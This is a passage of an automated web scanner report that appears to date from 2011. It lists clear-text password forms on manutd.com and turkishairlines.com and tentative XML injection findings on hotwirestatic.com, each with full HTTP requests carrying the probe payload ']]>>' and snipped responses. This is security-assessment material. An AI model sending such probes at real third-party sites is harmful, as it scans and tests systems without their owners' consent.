Host:   http://www.manutd.com
Path:   /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.2.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 28270
Cache-Control: public, max-age=553
Date: Sun, 02 Oct 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" class="hiddeninput" />
...[SNIP]...

7.11. http://www.manutd.com/en/One-United.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/One-United.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en/One-United.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.3.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 23135
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:54:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United.aspx" class="hiddeninput" />
...[SNIP]...

7.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
</label>
<input style="width:145px;" type="password" class="medium float-left" name="j_password" id="texta2" maxlength="6" />
</div>
...[SNIP]...

8. XML injection
There are 224 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


8.1. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/??css/hotelDetails-sprite.css,css/purchasePath-sprite.css,css/details.css,css/hotels-sprite.css,css/tripWatcherLayout.css,css/promoUnit.css,ver=222153 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:01:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 1025

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.2. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/??css/hotelDetails-sprite.css,css/purchasePath-sprite.css,css/details.css,css/hotels-sprite.css,css/tripWatcherLayout.css,css/promoUnit.css,ver=222153 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:01:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 1025

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.3. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/BedTypeSelectionComp.css?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:20 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.4. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/BedTypeSelectionComp.css?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.5. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/BedTypeSelectionComp.css?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:27 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.6. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/BedTypeSelectionComp.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/BedTypeSelectionComp.css]]>>?ver=171374 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.7. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/car/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.8. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/car/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535976
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.9. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css]]>>/car/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.10. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/car]]>>/CarAddOnComp.css?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535954
Date: Mon, 03 Oct 2011 01:02:09 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.11. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/car/CarAddOnComp.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy/css/car/CarAddOnComp.css]]>>?ver=206929 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535999
Date: Mon, 03 Oct 2011 01:02:11 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.12. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/deploy/css/hotel/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:21 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.13. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/deploy]]>>/css/hotel/details/hotelDetailsMapContainerComp.css?ver=219463 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:24 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.14. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
